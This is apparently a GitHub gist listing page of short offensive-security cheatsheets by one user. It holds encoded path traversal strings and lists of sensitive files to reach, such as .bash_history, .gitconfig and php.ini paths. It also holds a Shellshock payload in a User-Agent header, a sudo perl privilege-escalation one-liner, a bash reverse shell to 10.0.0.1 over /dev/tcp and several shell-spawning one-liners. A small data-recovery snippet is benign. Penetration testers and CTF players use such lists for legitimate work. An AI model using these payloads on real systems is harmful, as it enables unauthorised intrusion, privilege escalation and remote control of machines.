Petr Pospíšil SleepyLctl
SleepyLctl
/ Windows Path Traversal Cheatsheet
Last active
June 11, 2024 23:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Encoded Traversal Strings: | |
| ../ | |
| ..\ | |
| ..\/ | |
| %2e%2e%2f | |
| %252e%252e%252f | |
| %c0%ae%c0%ae%c0%af | |
| %uff0e%uff0e%u2215 | |
| %uff0e%uff0e%u2216 |
SleepyLctl
/ Linux Path Traversal Cheatsheet
Created
July 30, 2017 11:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Encoded Traversal Strings: | |
| ../ | |
| ..\ | |
| ..\/ | |
| %2e%2e%2f | |
| %252e%252e%252f | |
| %c0%ae%c0%ae%c0%af | |
| %uff0e%uff0e%u2215 |
SleepyLctl
/ Linux Path Traversal Cheatsheet - HOME dir
Created
July 30, 2017 12:45
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .aptitude/config | |
| .bash_config | |
| .bash_history | |
| .bash_logout | |
| .bashrc | |
| .cache/notify-osd.log | |
| .config/oDesk/oDesk Team.conf | |
| .cshrc | |
| .gitconfig | |
| .history |
SleepyLctl
/ Path Traversal GARBAGE_ALL Cheatsheet
Created
July 30, 2017 12:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /etc/php.ini | |
| /bin/php.ini | |
| /etc/httpd/php.ini | |
| /usr/lib/php.ini | |
| /usr/lib/php/php.ini | |
| /usr/local/etc/php.ini | |
| /usr/local/lib/php.ini | |
| /usr/local/php/lib/php.ini | |
| /usr/local/php4/lib/php.ini | |
| /usr/local/php5/lib/php.ini |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Injectable: Referer:; User-Agent:; and other Headers | |
| ########################################################### | |
| GET /script.sh HTTP/1.0 | |
| Host: localhost | |
| User-Agent: () { ignored;};echo -e "Content-Type: text/plain\r\n\r"; /usr/bin/id | |
| ########################################################### |
SleepyLctl
/ Linux Privilage Escalation
Created
December 12, 2017 14:01
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # sudo -l | |
| SUDO PERL | |
| #################################### | |
| sudo perl -e "system('/bin/sh')" |
SleepyLctl
/ Linux Data Recovery
Last active
December 14, 2017 12:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Make an image of the device first | |
| ################################# | |
| # dd if=/dev/target_partition of=/home/user/partition.image | |
| fdisk -l | |
| # fsck | |
| # strings /dev/sda | grep |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Bash | |
| Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): | |
| bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
| PERL | |
| Here’s a shorter, feature-free version of the perl-reverse-shell: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Bash | |
| Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10): | |
| bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 | |
| PERL | |
| Here’s a shorter, feature-free version of the perl-reverse-shell: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Shell Spawning | |
| python -c 'import pty; pty.spawn("/bin/sh")' | |
| echo os.system('/bin/bash') | |
| /bin/sh -i | |
| perl —e 'exec "/bin/sh";' |
OlderNewer